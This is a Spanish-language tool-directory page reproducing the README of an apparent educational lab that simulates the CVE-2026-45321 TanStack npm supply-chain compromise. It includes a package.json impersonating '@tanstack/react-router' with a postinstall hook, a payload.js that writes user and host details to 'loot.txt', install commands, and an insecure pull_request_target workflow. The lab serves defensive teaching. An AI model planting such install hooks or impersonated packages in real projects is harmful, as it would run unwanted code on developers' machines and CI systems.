Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-45321-Tanstack — Laboratorio educativo que simula ataques a la cadena de suministro de npm, abuso de CI/CD y ejecución de código en el momento de la instalación mediante CVE-2026-45321. Entrenamiento defensivo práctico de seguridad con despliegue local de paquetes maliciosos. | Kitploit
Herramientas/GitHubGitHub/7whyex/cve-2026-45321-tanstack
Análisis de VulnerabilidadesAnálisis de MalwareSeguridad de Cadena de SuministroAprendizaje y EducaciónLabs y Práctica
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Laboratorio educativo que simula ataques a la cadena de suministro de npm, abuso de CI/CD y ejecución de código en el momento de la instalación mediante CVE-2026-45321. Entrenamiento defensivo práctico de seguridad con despliegue local de paquetes maliciosos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 mesAún no revisado

Simulación de Ataque a la Cadena de Suministro — CVE-2026-45321 (TanStack)

Laboratorio educativo para entender ataques a la cadena de suministro de npm, abuso de CI/CD y ejecución de código en tiempo de instalación

Descargo de responsabilidad

Este proyecto se ha creado únicamente para:

  • aprendizaje de ciberseguridad,
  • investigación de seguridad defensiva,
  • simulación de laboratorio local,
  • comprender el concepto de ataque a la cadena de suministro.

No utilice este proyecto para:

  • atacar sistemas reales,
  • robar credenciales,
  • despliegue de malware,
  • acceso no autorizado,
  • o cualquier otra actividad ilegal.

Descripción

Este laboratorio simula los conceptos básicos del incidente:

  • CVE-2026-45321
  • Compromiso de la cadena de suministro de TanStack npm
  • Abuso de GitHub Actions CI/CD
  • Ejecución de scripts de ciclo de vida de npm

La simulación se realiza de forma local y segura sin:

  • robo real de credenciales,
  • exfiltración de tokens,
  • ni compromiso de servicios de terceros.

Estructura del laboratorio

root@kitploit:~
lab/
├── fake-repo/          # Simulación de repositorio objetivo
├── attacker-package/   # Simulación de paquete malicioso
└── victim-project/     # Simulación de víctima

Cómo funciona la simulación

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
el script postinstall se ejecuta
        ↓
payload.js se ejecuta automáticamente
        ↓
La víctima sufre una ejecución en tiempo de instalación

Conceptos aprendidos

  • hooks del ciclo de vida de npm
  • ejecución arbitraria de código en tiempo de instalación
  • ataque a la cadena de suministro
  • límite de confianza de CI/CD
  • paquete npm malicioso
  • abuso de postinstall
  • compromiso de dependencias

Instalación

1. Clonar el repositorio

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Configuración del paquete atacante

2. Entrar en la carpeta del paquete atacante

root@kitploit:~
cd attacker-package

3. Instalar dependencias

root@kitploit:~
npm install

4. Construir el paquete tarball

root@kitploit:~
npm pack

Resultado:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Simulación de la víctima

5. Entrar en el proyecto de la víctima

root@kitploit:~
cd ../victim-project

6. Instalar el paquete malicioso

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Salida

Si tiene éxito, aparecerá:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

y el archivo:

root@kitploit:~
loot.txt

se creará automáticamente.


Ejemplo de payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Ejemplo de package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Simulación de CI/CD

Este proyecto también se puede utilizar para comprender:

  • GitHub Actions
  • pull_request_target
  • límite de privilegios de CI/CD
  • ejecución de dependencias

Ejemplo de flujo de trabajo:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Relación con CVE-2026-45321

Laboratorio de simulaciónMundo real
attacker-packagepaquete TanStack comprometido
payload.jsinstalador malicioso

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Solo con fines educativos

Este laboratorio se ha creado para aumentar la conciencia sobre:

  • seguridad de la cadena de suministro,
  • seguridad de dependencias,
  • seguridad de CI/CD,
  • e investigación de seguridad defensiva.
Descargar herramienta
postinstallabuso de hook de ciclo de vida
victim-projectdesarrollador/CI víctima
fake-repoGitHub Actions pipeline